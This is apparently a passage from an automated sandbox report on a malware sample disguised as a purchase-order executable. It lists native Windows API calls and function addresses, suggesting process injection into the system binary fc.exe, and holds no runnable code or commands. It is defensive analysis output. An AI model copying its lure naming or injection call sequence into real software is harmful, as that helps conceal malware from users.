              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582CF0 NtOpenProcess,0_2_01582CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582CA0 NtQueryInformationToken,0_2_01582CA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582F60 NtCreateProcessEx,0_2_01582F60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582F30 NtCreateSection,0_2_01582F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582FE0 NtCreateFile,0_2_01582FE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582F90 NtProtectVirtualMemory,0_2_01582F90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582FB0 NtResumeThread,0_2_01582FB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582FA0 NtQuerySection,0_2_01582FA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582E30 NtWriteVirtualMemory,0_2_01582E30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582EE0 NtQueueApcThread,0_2_01582EE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582E80 NtReadVirtualMemory,0_2_01582E80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582EA0 NtAdjustPrivilegesToken,0_2_01582EA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01583010 NtOpenDirectoryObject,0_2_01583010
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01583090 NtSetValueKey,0_2_01583090
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015839B0 NtGetContextThread,0_2_015839B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01583D70 NtOpenThread,0_2_01583D70
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01583D10 NtOpenProcessToken,0_2_01583D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE4340 NtSetContextThread,LdrInitializeThunk,6_2_02DE4340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE4650 NtSuspendThread,LdrInitializeThunk,6_2_02DE4650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2AD0 NtReadFile,LdrInitializeThunk,6_2_02DE2AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2AF0 NtWriteFile,LdrInitializeThunk,6_2_02DE2AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02DE2BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02DE2BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02DE2BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2B60 NtClose,LdrInitializeThunk,6_2_02DE2B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02DE2EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02DE2E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2FE0 NtCreateFile,LdrInitializeThunk,6_2_02DE2FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2FB0 NtResumeThread,LdrInitializeThunk,6_2_02DE2FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2F30 NtCreateSection,LdrInitializeThunk,6_2_02DE2F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02DE2CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02DE2C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2C60 NtCreateKey,LdrInitializeThunk,6_2_02DE2C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2DD0 NtDelayExecution,LdrInitializeThunk,6_2_02DE2DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02DE2DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02DE2D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02DE2D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE35C0 NtCreateMutant,LdrInitializeThunk,6_2_02DE35C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE39B0 NtGetContextThread,LdrInitializeThunk,6_2_02DE39B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2AB0 NtWaitForSingleObject,6_2_02DE2AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2B80 NtQueryInformationFile,6_2_02DE2B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2EA0 NtAdjustPrivilegesToken,6_2_02DE2EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2E30 NtWriteVirtualMemory,6_2_02DE2E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2F90 NtProtectVirtualMemory,6_2_02DE2F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2FA0 NtQuerySection,6_2_02DE2FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2F60 NtCreateProcessEx,6_2_02DE2F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2CC0 NtQueryVirtualMemory,6_2_02DE2CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2CF0 NtOpenProcess,6_2_02DE2CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2C00 NtQueryInformationProcess,6_2_02DE2C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2DB0 NtEnumerateKey,6_2_02DE2DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE2D00 NtSetInformationFile,6_2_02DE2D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE3090 NtSetValueKey,6_2_02DE3090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE3010 NtOpenDirectoryObject,6_2_02DE3010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE3D70 NtOpenThread,6_2_02DE3D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE3D10 NtOpenProcessToken,6_2_02DE3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_003693B0 NtCreateFile,6_2_003693B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_00369520 NtReadFile,6_2_00369520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_00369610 NtDeleteFile,6_2_00369610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_003696B0 NtClose,6_2_003696B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_00369820 NtAllocateVirtualMemory,6_2_00369820
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B98B130_2_00B98B13
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B828C00_2_00B828C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B810000_2_00B81000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00BAF1630_2_00BAF163
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B832100_2_00B83210
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B832050_2_00B83205
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B903130_2_00B90313
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B905330_2_00B90533
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B96D130_2_00B96D13
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B8E5120_2_00B8E512
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B8E5130_2_00B8E513
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B96D0E0_2_00B96D0E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B8467A0_2_00B8467A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B8E6630_2_00B8E663
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00B8E6570_2_00B8E657
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D81580_2_015D8158
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EA1180_2_015EA118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015401000_2_01540100
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016081CC0_2_016081CC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016041A20_2_016041A2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016101AA0_2_016101AA
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E20000_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160A3520_2_0160A352
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016103E60_2_016103E6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E3F00_2_0155E3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F02740_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D02C00_2_015D02C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015505350_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016105910_2_01610591
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016024460_2_01602446
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F44200_2_015F4420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FE4F60_2_015FE4F6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015747500_2_01574750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015507700_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154C7C00_2_0154C7C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156C6E00_2_0156C6E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015669620_2_01566962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0161A9A60_2_0161A9A6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A00_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015528400_2_01552840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155A8400_2_0155A840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E8F00_2_0157E8F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015368B80_2_015368B8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160AB400_2_0160AB40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01606BD70_2_01606BD7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA800_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015ECD1F0_2_015ECD1F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155AD000_2_0155AD00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154ADE00_2_0154ADE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01568DBF0_2_01568DBF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550C000_2_01550C00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540CF20_2_01540CF2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0CB50_2_015F0CB5
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C4F400_2_015C4F40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01570F300_2_01570F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F2F300_2_015F2F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01592F280_2_01592F28
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01542FC80_2_01542FC8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155CFE00_2_0155CFE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CEFA00_2_015CEFA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550E590_2_01550E59
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160EE260_2_0160EE26
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160EEDB0_2_0160EEDB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562E900_2_01562E90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160CE930_2_0160CE93
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0161B16B0_2_0161B16B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153F1720_2_0153F172
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158516C0_2_0158516C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155B1B00_2_0155B1B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160F0E00_2_0160F0E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016070E90_2_016070E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FF0CC0_2_015FF0CC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015570C00_2_015570C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153D34C0_2_0153D34C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160132D0_2_0160132D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0159739A0_2_0159739A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156B2C00_2_0156B2C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F12ED0_2_015F12ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015552A00_2_015552A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016075710_2_01607571
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015ED5B00_2_015ED5B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015414600_2_01541460
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160F43F0_2_0160F43F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160F7B00_2_0160F7B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015956300_2_01595630
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016016CC0_2_016016CC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015599500_2_01559950
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156B9500_2_0156B950
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E59100_2_015E5910
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BD8000_2_015BD800
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015538E00_2_015538E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160FB760_2_0160FB76
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158DBF90_2_0158DBF9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C5BF00_2_015C5BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156FB800_2_0156FB80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01607A460_2_01607A46
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160FA490_2_0160FA49
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C3A6C0_2_015C3A6C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FDAC60_2_015FDAC6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EDAAC0_2_015EDAAC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01595AA00_2_01595AA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F1AA30_2_015F1AA3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01607D730_2_01607D73
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01553D400_2_01553D40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01601D5A0_2_01601D5A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156FDC00_2_0156FDC0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C9C320_2_015C9C32
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160FCF20_2_0160FCF2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160FF090_2_0160FF09
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01551F920_2_01551F92
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160FFB10_2_0160FFB1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01559EB00_2_01559EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E302C06_2_02E302C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E502746_2_02E50274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E703E66_2_02E703E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DBE3F06_2_02DBE3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6A3526_2_02E6A352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E420006_2_02E42000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E681CC6_2_02E681CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E641A26_2_02E641A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E701AA6_2_02E701AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E381586_2_02E38158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DA01006_2_02DA0100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E4A1186_2_02E4A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DCC6E06_2_02DCC6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DAC7C06_2_02DAC7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DD47506_2_02DD4750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB07706_2_02DB0770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E5E4F66_2_02E5E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E624466_2_02E62446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E544206_2_02E54420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E705916_2_02E70591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB05356_2_02DB0535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DAEA806_2_02DAEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E66BD76_2_02E66BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6AB406_2_02E6AB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DDE8F06_2_02DDE8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02D968B86_2_02D968B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DBA8406_2_02DBA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB28406_2_02DB2840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E7A9A66_2_02E7A9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB29A06_2_02DB29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DC69626_2_02DC6962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6EEDB6_2_02E6EEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DC2E906_2_02DC2E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6CE936_2_02E6CE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB0E596_2_02DB0E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6EE266_2_02E6EE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DA2FC86_2_02DA2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DBCFE06_2_02DBCFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E2EFA06_2_02E2EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E24F406_2_02E24F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E52F306_2_02E52F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DD0F306_2_02DD0F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DF2F286_2_02DF2F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DA0CF26_2_02DA0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E50CB56_2_02E50CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB0C006_2_02DB0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DAADE06_2_02DAADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DC8DBF6_2_02DC8DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DBAD006_2_02DBAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E4CD1F6_2_02E4CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E512ED6_2_02E512ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DCB2C06_2_02DCB2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB52A06_2_02DB52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DF739A6_2_02DF739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02D9D34C6_2_02D9D34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6132D6_2_02E6132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6F0E06_2_02E6F0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E670E96_2_02E670E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB70C06_2_02DB70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E5F0CC6_2_02E5F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DBB1B06_2_02DBB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E7B16B6_2_02E7B16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02D9F1726_2_02D9F172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DE516C6_2_02DE516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E616CC6_2_02E616CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6F7B06_2_02E6F7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DA14606_2_02DA1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6F43F6_2_02E6F43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E4D5B06_2_02E4D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E675716_2_02E67571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E5DAC66_2_02E5DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E51AA36_2_02E51AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E4DAAC6_2_02E4DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DF5AA06_2_02DF5AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E23A6C6_2_02E23A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E67A466_2_02E67A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6FA496_2_02E6FA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E25BF06_2_02E25BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DEDBF96_2_02DEDBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DCFB806_2_02DCFB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6FB766_2_02E6FB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB38E06_2_02DB38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E1D8006_2_02E1D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB99506_2_02DB9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DCB9506_2_02DCB950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E459106_2_02E45910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB9EB06_2_02DB9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02DB1F926_2_02DB1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_02E6FFB16_2_02E6FFB1
